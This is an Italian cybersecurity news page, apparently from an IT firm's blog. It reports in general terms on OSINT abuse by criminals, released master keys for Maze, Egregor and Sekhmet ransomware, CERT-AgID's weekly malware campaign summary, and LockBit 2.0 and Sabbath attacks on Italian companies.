Il problema è che, come già successo in molti casi, anche questa attività è stata inglobata dal mondo del crimine informatico. Un esempio: poniamo il caso di un attaccante che decida di colpire una determinata azienda. Per farlo inizia a raccogliere tutte le informazioni che trova disponibili sul web rispetto al suo bersaglio: dati aziendali, sui dipendenti, sulle sedi, sui dirigenti aziendali. Tramite Shodan può verificare eventuali vulnerabilità sull’infrastruttura dell’azienda. A questo punto può già approntare un attacco contro la rete oppure confezionare il classico attacco di spear phishing. Oppure può lanciare un attacco MiT, man in the middle, intercettando una conversazione per poi pilotarla nella direzione da lui voluta. In generale tutte le attività di ingegneria sociale non potrebbero esistere in assenza di fonti OSINT.

Per approfondire > Come funzionano le truffe Business Email Compromise? Come la Polizia postale ha sventato una truffa contro un’azienda di Gorizia

Oppure, peggio ancora, può andare nel dark web e ricercare ad esempio le chiavi di accesso alle VPN aziendali: queste magari si trovano li, insieme ai dati dei dipendenti, dopo che l’azienda ha già subito in precedenza un breach.

Per approfondire > Nel darkweb è boom di vendite di accessi abusivi alle reti hackerate

Perchè il punto è, come ormai raccontiamo da anni, che i dati rubati con malware, trojan, esfiltrazioni, attacchi ransomware finiscono in vendita o semplicemente pubblicati nel dark web: da quel momento sono disponibili a tutti. Il dark web è una delle più grandi fonti OSINT del mondo (non a caso è ormai piuttosto comune che forze dell’ordine, aziende di cybersecurity, società investigative ma anche comitati di ricerca ecc., navighino nel dark web in cerca di informazioni. E i tool per farlo si stanno moltiplicando).

Un esempio pratico > Data leak: disponibili gratuitamente nel dark web i dati di quasi 4000 dirigenti di aziende anche italiane

I software OSINT ormai hanno raggiunto una efficacia impressionante: sono capaci di rovistare in tutto ciò che sta online e collegare, partendo da un singolo nome, nickname, numeri di telefono, codici fiscali, video, post e foto social, record whois, metadati, dati di geolocalizzazione, account ed eventuali credenziali ecc… e la singola azienda o persona riguardata da tali indagini sicuramente non ha alcuna consapevolezza della mole impressionante di informazioni che, volenti o nolenti, sono disponibili su di noi nel web emerso o sotterraneo. Il cyber crime, come già ha approfittato dell’Intelligenza Artificiale e del Machine learning, non poteva che fare altro che utilizzarli a fini di racolta informazioni per rendere ancora più performanti i propri attacchi.

Nulla altro da dire: siamo di fronte ad una nuova frontiera del crimine informatico, che probabilmente scalzerà i ransomware dal podio delle minacce informatiche.

L’editoriale di Alessandro Papini, presidente di Accademia Italiana Privacy > OSINT: la nuova frontiera del crimine informatico

01_(1)[1]

Ransomware news: risolvibili le criptazioni di Maze, Egregor e Sekhmet

mercoledì 16 febbraio 2022
Ransomware news: risolvibili le criptazioni di Maze, Egregor e Sekhmet

Uno sviluppatore ransomware ha reso disponibili alla redazione della rivista specializzata in cyber security Bleeping Computer le master key per la risoluzione delle criptazioni effettuate dai ransomware Maze, Egregor e Sekhmet.

Maze in breve
Le operazioni del ransomware Maze sono iniziate nel Maggio 2019 e, in pochi mesi, gli hanno valso il titolo di top ransomware. Maze è stata famiglia ransomware che ha introdotto il metodo della doppia estorsione, ovvero la modalità di ricatto con la quale alle vittime sono richiesti due riscatti: uno viene richiesto per la concessione del tool di decriptazione per riportare in chiaro i file, l’altro invece per evitare la pubblicazione dei dati rubati e la loro messa in vendita. All’origine c’è una nuova modalità di attacco: se fino a quel momento i ransomware si limitavano a criptare i ransomware presenti nei dispositivi e reti violate, con Maze la fase di criptazione viene preceduta da una fase di esfiltrazione dei dati. In breve, gli attaccanti prima rubano una copia dei dati, poi li criptano.

Per approfondire> Come si ricatta un’azienda: il ransomware Maze colpisce la più grande azienda di sicurezza U.S.A e inizia l’incubo. Un nuovo paradigma per i ransomware?

Da Maze a Egregor

Nell’Ottobre del 2020 il gruppo di cyber attaccanti comunica la cessazione delle operazioni col ransomware Maze. La tregua dura pochissimo, perchè a Settembre il gruppo di ribrandizza: il gruppo Maze, diviene Egregor. Le operazioni di Egregor, per quanto di grande impatto, durano poco: l’intera rete degli affiliati di Maze migra su Egregor, che quindi già agli albori può contare su una vasta rete di affiiliati. Maze infatti era organizzato secondo il modello del Ransomware-as-a-service (SaaS). Le operazioni si interrompono dopo che un’operazione congiunta tra le forze dell’ordine ucraine e francesi porta in carcere gli sviluppatori del ransomware, che rimanevano comunque responsabili della gestione della pagina di pagamento e del sito di leak dove venivano pubblicati i dati delle vittime sotto ricatto.
Per approfondire > Ascesa e caduta del ransomware Egregor: in arresto il team di sviluppatori e gestori

Sekmeth invece inizia le operazioni di diffusione nel Marzo 2020: Maze è ancora attivo. I legami tra le due famiglie ransomware sono però ricorrenti. Ad esempio Egregor utilizza parte del codice di Maze e presenta forti similitudini tra la nota di riscatto e i siti di pagamento dei due ransowmare.

Master KEY released!
E’ stato un utente sulla community di Bleeping Computer a rilasciare le master key: presentandosi come sviluppatore di tutte e tre le famiglie ransomware, l’utente ha reso disponibili

9 master key per la versione originale di Maze, quella ancora approntata per colpire utenti finali più che aziende;
30 master key per le versioni più recenti di Maze;
19 master key per Egregor;
1 master key per Sekhmet.
Gli esperti di cybersecurity Gillespie e Wosar hanno proceduto a verificare la correttezza di queste chiavi, riscontrando come queste siano legittime e possano essere utilizzate per riportare in chiaro e senza danni i file criptati.

La master key di Maze. Fonte: community di Bleeping Computer

Sei stato vittima di Maze, Egregor o Sekhmet?
Se tu stesso o qualcuno dei tuoi clienti è stato colpito da una di queste famiglie ransomware e attualmente non ha accesso a tutti o parte dei suoi dati, contatta i nostri esperti del servizio di risoluzione ransomware decyrptolocker.it. Riceverai tutta l’assistenza necessaria, nonchè misure di mitigazione e sicurezza informatica per evitare di subire nuovi attacchi.

Vai al sito https://www.decryptolocker.it o contattaci inviando una email a alessandro@nwkcloud.com inviandoci la nota di riscatto e almeno due file criptati.

01+28129+28129[1]

Cosa “gira” in Italia? Malware e campagne di attacco individuate dal CERT – 4° settimana Gennaio 2022

lunedì 31 gennaio 2022
Cosa “gira” in Italia? Malware e campagne di attacco individuate dal CERT – 4° settimana Gennaio 2022

Quali malware girano nel panorama italiano? Quali campagne di attacco? Quali sono i malware che un team di sicurezza IT dovrebbe tenere d’occhio per aggiornare gli indici di compromissione dei sistemi di sicurezza così che possano bloccare un’infezione alla fonte?

A queste domande risponde settimanalmente il CERT-AgID con un apposito report che rende una fotografia delle cyber minacce individuate e analizzate dal team di esperti del Computer Emergency Response Team italiano.

I malware della settimana
Nel corso della scorsa settimana, il CERT-Agid ha individuato e sottoposto ad analisi 56 campagne dannose: di queste, 52 erano mirate contro utenti italiani mentre 4 sono state campagne generiche ma veicolate anche in Italia.

Le famiglie malware in diffusione sono state 6. Ecco il dettaglio:
Emotet conferma il ritorno in grande stile. E’ stato diffuso in Italia per l’intero arco della settimana con più campagne. In totale sono state individuate 9 campagne di diffusione Emotet, tutte veicolate via email contenenti allegati .xls o .zip con password;
AgenTesla è stato diffusio con 7 diverse campagne.Cinque sono state mirate contro utenti italiani, due sono state invece generiche. Tutte le campagne sono state veicolate via email, mentre gli allgati compromessi sono stati di formati diversi: .img, .iso, .gz, .docx e, ormai raro a vedersi, direttamente in formato eseguibile .exe.
Urnsif è stato diffuso con tre campagne molto insidiose, una delle quali a tema INPS: veicolate via email, contenevano allegati .zip coperti da password con file in formato .js e .xls;
Formbook è stato in diffusione con due campagne mirate er una generica: diffuso via email, recava allegati .XLS dannosi;
Lokibot di nuovo in diffusione con due campagne mirate contro utenti italiani. Le email veicolavano alegati .img e .zip;
Brata è stato diffuso con una sola campagna, ma è l’unico malware analizzato diffuso via SMS e non via email. L’SMS conteneva il link per il download del file APK dannoso.
Per approfondire > Bad news, Emotet is back: il malware è tornato in attività e sta ricostruendo la sua botnet
Per approfondire > Dentro Ursnif, il trojan bancario più diffuso in Italia
Le campagne di phishing della settimana 22 – 28 Gennaio
Inutile dire come, ancora una volta, il tema più rilevante sia stato quello bancario, seguiti subito dal tema “ordine”, quindi “resend”.

La maggior parte delle campagne a tema banking ha diffuso il malware AgenTesla, quelle a tema ordine hanno diffuso Lokibot, Formbook e AgenTesla, quelle a tema resend hanno diffuso esclusivamente Emotet.

Nell’immagine il resto dei temi delle campagne phishing analizzate

Fonte: https://cert-agid.gov.it

Tra i brand più sfruttati troviamo ovviamente quelli attinenti al tema bancario, cioè Nexi, Poste, Intesa San Paolo, BPM, BNL, Findomestic. Si segnalano alcune truffe a tema istituzionale, che hanno visto sfruttare i riferimenti di INAIL e INPS. Col tema ordine i brand più sfruttati sono stati Amazon e BRT.

Fonte: https://cert-agid.gov.it

Tipologia di file di attacco e vettore
Tra i file vettore preferiti dagli attaccanti troviamo i formati file Excel .XLS e .XLSX. Il formato archivio .ZIP occupa la seconda posizione tra i formati più utilizzati. Torna in diffusione anche il formato eseguibile .EXE

bb

Italia sotto attacco: ancora ransomware contro aziende italiane. Lockbit 2.0 protagonista

BForse non c’è da stupirsi, ma continua l’incessante fuoco che le gang ransomware stanno facendo contro le aziende italiane. Delle varie ASL sotto attacco abbamo già abbondantemente reso un quadro: l’unica novità è che l’ASL3 Napoli, colpita dal ransomware Sabbath poche settimane fa, ha già visto pubblicati parte dei dati rubati e non riuscirà a pagare interamente gli stipendi dei dipendenti a causa del protrarsi delle problematiche ai sistemi IT conseguenti all’attacco.

Sono invece notizie fresche due attacchi ransomware che hanno colpito PMI italiane, a riconferma che non solo enti governativi e big corporation debbano temere questi attacchi. LockBit 2.0 ha colpito le aziende Isnardi e La Ponte Marmi nell’arco di una settimana circa.

Il sito https://doubleextortion.com dell’esperto di cybersecurity Luca Mella, riporta un numero preoccupante di attacchi contro aziende italiane nell’ultimo mese: dal 9 Gennaio ad ora sono state vittime di ransomware le aziende Uform srl, l’azienda di accessori e moda Giovanardi, la ben nota Moncler e le due già menzionate. Le famiglie ransomware più scatenate? Lockbit 2.0 la fa sicuramente da padrone, seguito Sabbath.

L’attacco contro Isnardi: cosa sappiamoLa notizia dell’attacco si è diffusa al momento in cui il gruppo che gestisce LockBit 2.0 ha reso pubblica sul proprio sito di leak la rivendicazione dell’attacco. Nel testo il gruppo spiega di aver violato i sistemi aziendali e avviato un countdown che scadrà il 10 Febbraio alle ore 12.30, ora italiana.

La Isnardi è un’azienda ligure conm sede a Pontedassio e produce olio e altri prodotti derivati dalle olive.

Fonte: lockbit 2.0 data leak site

Non sono trapelate altre informazioni: l’azienda non ha reso comunicazioni pubbliche quindi le uniche informazioni disponibili solo quelle pubblicate dagli attaccanti. Il sito web aziendale è comunque regolarmente disponibile online.

L’attacco contro La Ponte Marmi: cosa sappiamo
La Ponte Marmi srl, specializzata nella lavorazione e intaglio di marmi e pietre, ha la sede a Grezzana Verona. Anche in questo caso non risultano comunicazioni ufficiali da parte dell’azienda e le informazioni disponibili sono soltanto quelle presenti sul data leak site di Lockbit 2.0. Anche in questo caso, oltre ad una breve descrizione dell’azienda e alla minaccia di pubblicazione dei dati, sul sito di leak si vede ben chiaro il countdown, in scadenza il 10 Febbraio anch’esso.

Le 2 famiglie ransomware in breve: LockBit e Sabbath
Siamo consapevoli di quanto sia estremamente limitante dover produrre solo generiche descrizioni degli attacchi. Come denunciato ormai da quasi tutti gli esperi di cybersecurity e gli addetti al settore, questa tradizione tutta italiana di non comunicare gli attacchi subiti e chiudersi nel più stretto riserbo non fa altro che produrre un grande vantaggio per gli attaccanti. Non sono conosciuti, ad esempio, i punti di accesso sfruttati dagli attaccanti e, in certi casi, mancano perfino indicatori di compromissione che potrebbero essere utili in forma preventiva.

Rendiamo quindi brevi descrizioni delle famiglie maggiormente attive, nella consapevolezza della mancanza di dati tecnici utili a rafforzare le difese aziendali per queste minacce specifiche.

LockBit 2.0
LockBit è stato individuato in diffusione per la prima volta nel Settembre 2019, ma con un nome differente ovvero “ABCD Ransomware”. Ha continuato poi ad essere sviluppato ed affinato divenendo una minaccia malware complessa: le versioni recenti sono passate dall’uso dell’estensione di criptazione .abcd all’estensione di criptazione .lockbit, alla quale si deve il nome attuale del malware. Come tutti i ransomware, il suo unico scopo è quello di criptare i dati presenti in una rete, impedendone così l’accesso ai legittimi proprietari per poter così richiedere in cambio una somma di denaro in riscatto. Al contrario di altri ransomware però, ha sempre preferito colpire aziende ed enti governativi piuttosto che utenti finali.

Si diffonde in tre diverse modalità:

self-spreading, ovvero auto diffusione nella rete bersaglio;
con attacchi mirati, soprattutto email di phishing e spam organizzate secondo i principi dell’ingegneria sociale;
usando tool per la diffusione, come Windows PowerShell o Server Message Block (SMB).

A partire dalla seconda metà del 2021 il ransomware si è evoluto fino ad arrivare alla versione 2.0 e prendersi, a fianco di Conti, il podio delle famiglie ransomware più accanite contro l’Italia. L’ultima novità è la capacità di LockBit di criptare anche sistemi Linux e macchine virtuali macchine virtuali VMware ESXi.

Per approfondire > Il ransomware Lockbit si evolve: è il primo ad aver automatizzato la criptazione dei domini Windows sfruttando le policy di gruppo

Per approfondire > LockBit, il ransomware che predilige le aziende italiane, si evolve. Ora colpisce anche le macchine virtuali

Sabbath (54BB47h)
Sabbath, conosciuto anche come 54BB47h, viene individuato in diffusione in attacchi reali già nel Luglio 2020: al tempo però si chiamava Eruption, poi si è evoluto e, sopratutto, ha iniziato importanti collaborazioni con i cosiddetti access broker cioè cybercriminali i cui servizi si concentrano nel fornire il primo accesso alla rete bersaglio. Sabbath è passato così dalle tradizionali tecniche di attacco ransomware, mirando sopratutto a singoli utenti finali e professionisti, per passare alle moderne tecniche di attacco mirato a doppia estorsione contro infrastrutture aziendali.

Nel Giugno 2021 il gruppo si rende responsabile di centinaia di attacchi mirati contro scuole e strutture sanitarie negli Stati Uniti. La preferenza sul settore sanitario si conferma nel tempo e l’hack dell’ASL 3 Napoli ne è solo l’ulteriore conferma. Anche qui, non si conoscono in dettaglio le tecniche di attacco. Il gruppo ha fatto sapere che, nel caso dell’attacco all’ASL3 Napoli sono state violate infrastrutture protette da soluzioni di IDR di Cortex dell’americana Palo Alto Network. Dispongono quindi di exploit specifici? Oppure la falla che ha permesso di accedere alla reti dell’ASL è da rintracciarsi in errori del team IT? Non è dato saperlo, purtroppo. Sicuramente Sabbath si avvale di exploit kit e del celebre tool di penetration Cobal Strike, ma questo è ormai l’armamentario standard per questo tipo di attacchi.

Una delle note di riscatto del ransomware Sabbath

logHD1

YOTTA WEB - Via Don F. Cabrio 14/D - 13900 Biella (BI)

P.IVA 02552590024 - C.F. SNTSVR77S27A859C - REA BI 194613

Copyright 2017 © YOTTA WEB All Rights Reserved

Privacy Policy